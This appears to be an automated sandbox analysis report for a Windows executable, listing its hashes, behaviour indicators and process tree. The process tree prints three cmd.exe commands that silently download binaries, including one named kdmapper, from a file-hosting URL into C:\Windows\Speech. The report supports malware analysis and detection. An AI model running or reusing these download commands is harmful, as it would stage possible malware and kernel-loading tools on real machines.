c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966

Analysis

max time kernel
83s
max time network
18s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
09/11/2024, 18:23

Target

c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe
Size

575KB
MD5

21110bdf3a234f15f6f7523aa0fa0e90
SHA1

50f8de3658915f7967042f071a95522866d149f9
SHA256

c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966
SHA512

6c61cb2c3fae5ba1511ec2ef468d54240fd428834495fba919a91e90a7d00cbff0868e65b3d29f08327244b2c6e1b369bbb4b3acddde1b5a7156bf87be575c50
SSDEEP

12288:QgBHXRtrPBInYtSsnadym2jO+Aem8kAuW3f:DjJPB0sn4AV3

Score

1^/10

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2432	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 2716	2432	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	32
PID 2432 wrote to memory of 2716	2432	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	32
PID 2432 wrote to memory of 2716	2432	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	32
PID 2432 wrote to memory of 2764	2432	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	33
PID 2432 wrote to memory of 2764	2432	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	33
PID 2432 wrote to memory of 2764	2432	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	33
PID 2432 wrote to memory of 2768	2432	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	34
PID 2432 wrote to memory of 2768	2432	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	34
PID 2432 wrote to memory of 2768	2432	c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe	34

C:\Users\Admin\AppData\Local\Temp\c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe
"C:\Users\Admin\AppData\Local\Temp\c290ad62817046fb9f21fecf38ec7da631f48e9dd7b3aba5ab17e9fe51ea9966N.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe
  2⤵
  PID:2716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
  2⤵
  PID:2768